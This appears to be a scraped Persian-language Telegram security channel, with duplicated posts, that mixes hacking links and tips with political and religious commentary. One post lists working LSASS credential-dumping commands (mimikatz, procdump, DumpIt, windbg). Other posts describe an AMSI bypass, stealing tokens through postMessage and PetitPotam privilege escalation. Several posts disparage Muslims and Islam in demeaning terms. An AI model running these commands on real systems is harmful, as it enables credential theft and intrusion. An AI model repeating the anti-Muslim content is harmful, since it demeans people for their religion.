شناسایی گروه های APT به احتمال زیاد مسئول یک حادثه امنیت سایبری از تکنیک های MITER ATT&CK در گزارش حادثه حادثه
https://gitlab.com/bontchev/whodunit
#APT
@PfkSecurity
https://gitlab.com/bontchev/whodunit
#APT
@PfkSecurity
GitLab
Vesselin Bontchev / whodunit · GitLab
Recognizing the most likely APT groups responsible for an incident
به زودی اکثر کسایی که از شاهزاده پهلوی حمایت میکردند دست از حمایت او بر میدارند این اقا حتی نمیتونه شلوارشو بکشه بالا نه قاجار نه پهلوی نه هر گروهک دیگه ای که تا الان هست نمیتونه کشور و اداره کنه بلاخره یکی از دل مردم ایران بیرون میاد صبر کنید ...
Man Zadgahe Kourosham
Sam Jamshidi
من زادگاه کورشم
آزاده ای پرشورشم
من نسل پاک آرشم
خون رگ سیاوشم
از چرم پرچم ساختم
تا بر ستمگر تاختم
#دختران_خیابان_انقلاب
#مهسا_امینی
#زن_زتدگی_آزادی
#Music
@PfkSecurity
آزاده ای پرشورشم
من نسل پاک آرشم
خون رگ سیاوشم
از چرم پرچم ساختم
تا بر ستمگر تاختم
#دختران_خیابان_انقلاب
#مهسا_امینی
#زن_زتدگی_آزادی
#Music
@PfkSecurity
AmsiBypassHookManagedAPI
یک تکنیک جدید AMSI Bypass با استفاده از .NET ALI Call Hooking.
https://github.com/pracsec/AmsiBypassHookManagedAPI
#AMSI #Bypass
@PfkSecurity
یک تکنیک جدید AMSI Bypass با استفاده از .NET ALI Call Hooking.
https://github.com/pracsec/AmsiBypassHookManagedAPI
#AMSI #Bypass
@PfkSecurity
GitHub
GitHub - pracsec/AmsiBypassHookManagedAPI: A new AMSI Bypass technique using .NET ALI Call Hooking.
A new AMSI Bypass technique using .NET ALI Call Hooking. - pracsec/AmsiBypassHookManagedAPI
دکتر رستم جمشیدی:
مسلمان ۱۴۰۰ ساله منتظر مهدی هستند و الله هم هنوز راه حل دیگری برای هدایت بشر جز فرستادن مهدی به مغزش خطور نمیکنه😂
#نه_به_اسلام
@pfksecurity
مسلمان ۱۴۰۰ ساله منتظر مهدی هستند و الله هم هنوز راه حل دیگری برای هدایت بشر جز فرستادن مهدی به مغزش خطور نمیکنه😂
#نه_به_اسلام
@pfksecurity
💠 پاکیزگی سیاسی
🌀 امروزه موجهترین ابزار برای سرکوب آزادی بیان پدیدهای مارکسیستی از جنس فرهنگ به نام پاکیزگی سیاسی است. پاکیزگی سیاسی یا همان نزاکت سیاسی با استفاده از نگاه هویتی و ایدئولوژیک به مسائلی مانند ( همجنسگرایی و فمنیسم و مهاجران و ... ) آنها را به یک جنگ طبقاتی تبدیل میکند و سعی دارد تا گفتمان خود را با استفاده از حربههایی همچون برچسپزنی و حذف و تحقیر برعلیه مخالفان به عنوان گفتمان غالب درآورد.
🌀 ایدههای سکسی و به ظاهر انسان دوستانه و مترقیگونه چپها اینبار رنگ و بوی اقتصادی ندارند، اینبار تنپوشی از جنس فرهنگ به انتخاب چپها درآمده است. چپهای اصلاحطلب دیگر مانند گذشته با ابزار کردن کارگران در پِی دستیابی به اهداف خود نیستند. پیگیری اهداف از شیوهای سخت به شیوهای نرم هوشمندانه تغییر گفتمان پیدا کرده است.
🌀ارزشهای ایدئولوژیک دنیای معاصر به انحصار تبلیغات رسانهچیها و سایر بازوهای تبلیغاتیشان درآمده است. هوشمندی چپها در این است که هرکس که خود را قربانی فرض میکند سریعا به گفتمان چپها در میآید. اسلامگرایان، زنها، سیاهپوستها، همجنسگرایان، کارگران و ... مواد لازم برای ساخت بنای چپها هستند.
@pfksecurity
🌀 امروزه موجهترین ابزار برای سرکوب آزادی بیان پدیدهای مارکسیستی از جنس فرهنگ به نام پاکیزگی سیاسی است. پاکیزگی سیاسی یا همان نزاکت سیاسی با استفاده از نگاه هویتی و ایدئولوژیک به مسائلی مانند ( همجنسگرایی و فمنیسم و مهاجران و ... ) آنها را به یک جنگ طبقاتی تبدیل میکند و سعی دارد تا گفتمان خود را با استفاده از حربههایی همچون برچسپزنی و حذف و تحقیر برعلیه مخالفان به عنوان گفتمان غالب درآورد.
🌀 ایدههای سکسی و به ظاهر انسان دوستانه و مترقیگونه چپها اینبار رنگ و بوی اقتصادی ندارند، اینبار تنپوشی از جنس فرهنگ به انتخاب چپها درآمده است. چپهای اصلاحطلب دیگر مانند گذشته با ابزار کردن کارگران در پِی دستیابی به اهداف خود نیستند. پیگیری اهداف از شیوهای سخت به شیوهای نرم هوشمندانه تغییر گفتمان پیدا کرده است.
🌀ارزشهای ایدئولوژیک دنیای معاصر به انحصار تبلیغات رسانهچیها و سایر بازوهای تبلیغاتیشان درآمده است. هوشمندی چپها در این است که هرکس که خود را قربانی فرض میکند سریعا به گفتمان چپها در میآید. اسلامگرایان، زنها، سیاهپوستها، همجنسگرایان، کارگران و ... مواد لازم برای ساخت بنای چپها هستند.
@pfksecurity
Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
https://github.com/stealthcopter/deepce
#Enum #privesc
@PfkSecurity
https://github.com/stealthcopter/deepce
#Enum #privesc
@PfkSecurity
GitHub
GitHub - stealthcopter/deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) - stealthcopter/deepce
دموکراتیک؛ کدواژه حکومتهای کمونیستی و مجاهدین خلق !
هرجا عبارت « دموکراتیک » را دیدید فقط میتوانم بگویم #فرار کنید ! این واژه برخلاف ظاهر زیبایش، در نام هر کشوری بکار رفته، جز بدبختی و ویرانی چیزی برای آن نداشته است ! بیش از ۱۰بار عبارت کثیف و منحوس دموکراتیک در متن منشور بکار رفته است
جمهوری دموکراتیک شکلی از حکومت است که بر اساس اصول اتخاذ شده از یک #جمهوری و یک #دموکراسی عمل میکند
پس از جنگ جهانی دوم بسیاری از کشورها در نام خود از عبارت «جمهوری دموکراتیک» استفاده کردند که تقریبا همهی آنها دولتهای تک حزبی مارکسیست-لنینیست یا سوسیالیست بودند که اجازه فعالیت سیاسی به مخالفان نمیدادند و مطبوعات آزاد وجود نداشت و هیچ اثری از آزادی واقعی در آن نبود
🔺جمهوری دموکراتیک آلمان (آلمان شرقی) جمهوری دموکراتیک سومالی، جمهوری دموکراتیک ویتنام (ویتنام شمالی)، جمهوری دموکراتیک خلق یمن (یمن جنوبی)..امروزه نیز؛ جمهوری دموکراتیک کنگو، اتیوپی، کره شمالی، لائوس، نپال و...
نمونه بارز این کشورها؛ جمهوری دموکراتیک کنگو است ! خودتان درباره آن تحقیق کنید
الان هم مجاهدین خلق با کلمه دموکراتیک ارضا شده است
@pfksecurity
هرجا عبارت « دموکراتیک » را دیدید فقط میتوانم بگویم #فرار کنید ! این واژه برخلاف ظاهر زیبایش، در نام هر کشوری بکار رفته، جز بدبختی و ویرانی چیزی برای آن نداشته است ! بیش از ۱۰بار عبارت کثیف و منحوس دموکراتیک در متن منشور بکار رفته است
جمهوری دموکراتیک شکلی از حکومت است که بر اساس اصول اتخاذ شده از یک #جمهوری و یک #دموکراسی عمل میکند
پس از جنگ جهانی دوم بسیاری از کشورها در نام خود از عبارت «جمهوری دموکراتیک» استفاده کردند که تقریبا همهی آنها دولتهای تک حزبی مارکسیست-لنینیست یا سوسیالیست بودند که اجازه فعالیت سیاسی به مخالفان نمیدادند و مطبوعات آزاد وجود نداشت و هیچ اثری از آزادی واقعی در آن نبود
🔺جمهوری دموکراتیک آلمان (آلمان شرقی) جمهوری دموکراتیک سومالی، جمهوری دموکراتیک ویتنام (ویتنام شمالی)، جمهوری دموکراتیک خلق یمن (یمن جنوبی)..امروزه نیز؛ جمهوری دموکراتیک کنگو، اتیوپی، کره شمالی، لائوس، نپال و...
نمونه بارز این کشورها؛ جمهوری دموکراتیک کنگو است ! خودتان درباره آن تحقیق کنید
الان هم مجاهدین خلق با کلمه دموکراتیک ارضا شده است
@pfksecurity
برای من تنها چیزی که مهم است ایران و فرهنگ ایران است و بس!
هر کس این سه مورد را نداشته باشد ایرانی نیست ، درسته تو ایران به دنیا آمده ولی نه خودش نه خانوادش ایرانی نیستند و تازی زاده اند .
شما اگر قوم یهود به ایران حمله میکرد بدون شک الان یهودی بودید ! اینقدر پست و احمق هستید که اصلا فکر نمیکنید اون سربازی که به دست اعراب کشته شد برای ایندگان و ناموسش به جنگ رفت بعد چسبیدی به اعراب !
دین اسلام فقط باب پسند دزدان و غارتگران و برده داران و شهوت رانان هستش چیزی برای انسانیت ندارد .
باعث بانی بدبختیای الان کشور هم زیر سر شما مسلمانان است .
#نه_به_اسلام
@pfksecurity
هر کس این سه مورد را نداشته باشد ایرانی نیست ، درسته تو ایران به دنیا آمده ولی نه خودش نه خانوادش ایرانی نیستند و تازی زاده اند .
شما اگر قوم یهود به ایران حمله میکرد بدون شک الان یهودی بودید ! اینقدر پست و احمق هستید که اصلا فکر نمیکنید اون سربازی که به دست اعراب کشته شد برای ایندگان و ناموسش به جنگ رفت بعد چسبیدی به اعراب !
دین اسلام فقط باب پسند دزدان و غارتگران و برده داران و شهوت رانان هستش چیزی برای انسانیت ندارد .
باعث بانی بدبختیای الان کشور هم زیر سر شما مسلمانان است .
#نه_به_اسلام
@pfksecurity
Telegram
P.F.K Security
سه پایه استوار ملیت ایرانی، بدون شک زرتشت، کوروش و فردوسی هستند.
زرتشت اندیشهی نیک را بنیاد نهاد و کوروش آن را به کردار نیک تبدیل کرد و فردوسی آن را با گفتار نیک بیان نمود.
@PFKSecurity
زرتشت اندیشهی نیک را بنیاد نهاد و کوروش آن را به کردار نیک تبدیل کرد و فردوسی آن را با گفتار نیک بیان نمود.
@PFKSecurity
باج افزار IceFire بازگشت | اکنون شبکه های سازمانی لینوکس را هدف قرار می دهیم
https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/
#Ransomware
@PfkSecurity
https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/
#Ransomware
@PfkSecurity
SentinelOne
IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks
New Linux version of the IceFire ransomware have been observed in recent network intrusions of media and entertainment enterprises.
🔥 آیین باستانی #چهارشنبه_سوری را به ملت ایران (و نه آنها که ایران و فرهنگش برایشان ارزشی ندارد از سرخ تا سیاه تا قبیله گرا) شادباش عرض می کنم.🔥
ای #آذر(آتش) اهورامزدا،🔥
آن هیزمی که بشاید تو را باد، آن اندوختهای که بشاید تو را باد، برنایی به نگاهبانی تو گماشته باد، دین آگاهی به نگاهبانی تو گماشته باد، تا تو هماره در این خانمان فروزان باشی🔥
✍️📗 #اوستا 🔥
پاس دارم آتش🔥 جاوید را
یادگار منش جمشید را
چند روزى مانده بودش تا به عید
آمد آتش🔥 در چنین روزى پدید
بهر او آتشگهى آراستند
از پلیدى و سیاهى کاستند
پس از آن هر روز در روزى چنین
جشن سورى بوده در ایرانزمین
تا که آتش🔥 را پرستارى کنیم
از اهورا طلب یارى کنیم.
- نور برتاریکی پیروز است .
🔥 چهارشنبه سوری تان شاد باد 🔥
#چهارشنبه_سوری
@PfkSecurity
ای #آذر(آتش) اهورامزدا،🔥
آن هیزمی که بشاید تو را باد، آن اندوختهای که بشاید تو را باد، برنایی به نگاهبانی تو گماشته باد، دین آگاهی به نگاهبانی تو گماشته باد، تا تو هماره در این خانمان فروزان باشی🔥
✍️📗 #اوستا 🔥
پاس دارم آتش🔥 جاوید را
یادگار منش جمشید را
چند روزى مانده بودش تا به عید
آمد آتش🔥 در چنین روزى پدید
بهر او آتشگهى آراستند
از پلیدى و سیاهى کاستند
پس از آن هر روز در روزى چنین
جشن سورى بوده در ایرانزمین
تا که آتش🔥 را پرستارى کنیم
از اهورا طلب یارى کنیم.
- نور برتاریکی پیروز است .
🔥 چهارشنبه سوری تان شاد باد 🔥
#چهارشنبه_سوری
@PfkSecurity
احتمالاً بسیاری از شما راه های مختلفی برای dump پروسس Lsass در ویندوز می دانید. ممکن است کسی بیش از پنج راه را بداند، اما باور کنید راه های بسیار بیشتری وجود دارد.
#0x01 > Mimikatz
Methods:
#0x02 > ProcDump
Methods:
#0x03 > Process Hacker
Methods:
#0x04 > DumpIt
Methods:
#0x05 > Windows Debugging Tools
Methods:
ادامه دارد ...
#Lsass #redteam
@PfkSecurity
#0x01 > Mimikatz
Methods:
Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync#0x02 > ProcDump
Methods:
procdump -ma lsass.exe lsass.dmp procdump -accepteula -64 -ma lsass.exe lsass.dmp#0x03 > Process Hacker
Methods:
System->LSASS process->Create Dump#0x04 > DumpIt
Methods:
tasklist /FI “IMAGENAME eq lsass.exe” DumpIt.exe PID output_file_name.bin#0x05 > Windows Debugging Tools
Methods:
windbg -p .dump /ma c:\path\to\lsass.dmp .detach .qادامه دارد ...
#Lsass #redteam
@PfkSecurity
به این ترتیب می توانید به راحتی توکن Access را از طریق Wildcard Origin در postMessage بدزدید.
#نکات #باگ_بانتی
#web #bugbounty #tips
@PfkSecurity
#نکات #باگ_بانتی
#web #bugbounty #tips
@PfkSecurity
#windows #privesc #rpc #petitpotam
🦛 PetitPotam: Local Privilege Escalation
Now PetitPotato can elevate to SYSTEM on the latest windows.
My test version is 10.0.20348.1547
PetitPotam
از MS-EFSR (رمزگذاری سیستم فایل رمزگذاری شده از راه دور) استفاده میکند، پروتکلی که برای انجام عملیات نگهداری و مدیریت بر روی دادههای رمزگذاریشده ذخیرهشده از راه دور و دسترسی از طریق شبکه استفاده میشود. یک سری API شبیه به EfsRpcOpenFileRaw در MS-EFSR وجود دارد. نحو API EfsRpcOpenFileRaw در زیر نشان داده شده است .
چنین API هایی می توانند یک مسیر UNC را از طریق پارامتر FileName برای باز کردن اشیاء رمزگذاری شده روی سرور برای پشتیبان گیری یا بازیابی مشخص کنند. وقتی مسیر در قالب \\IP\C$ مشخص شد، سرویس lsass.exe با دسترسی های حساب NT AUTHORITY SYSTEM به \\IP\pipe\srvsvc دسترسی خواهد داشت.
@pfksecurity
🦛 PetitPotam: Local Privilege Escalation
Now PetitPotato can elevate to SYSTEM on the latest windows.
My test version is 10.0.20348.1547
PetitPotam
از MS-EFSR (رمزگذاری سیستم فایل رمزگذاری شده از راه دور) استفاده میکند، پروتکلی که برای انجام عملیات نگهداری و مدیریت بر روی دادههای رمزگذاریشده ذخیرهشده از راه دور و دسترسی از طریق شبکه استفاده میشود. یک سری API شبیه به EfsRpcOpenFileRaw در MS-EFSR وجود دارد. نحو API EfsRpcOpenFileRaw در زیر نشان داده شده است .
long EfsRpcOpenFileRaw( [in] handle_t binding_h, [out] PEXIMPORT_CONTEXT_HANDLE* hContext, [in, string] wchar_t* FileName, [in] long Flags );چنین API هایی می توانند یک مسیر UNC را از طریق پارامتر FileName برای باز کردن اشیاء رمزگذاری شده روی سرور برای پشتیبان گیری یا بازیابی مشخص کنند. وقتی مسیر در قالب \\IP\C$ مشخص شد، سرویس lsass.exe با دسترسی های حساب NT AUTHORITY SYSTEM به \\IP\pipe\srvsvc دسترسی خواهد داشت.
@pfksecurity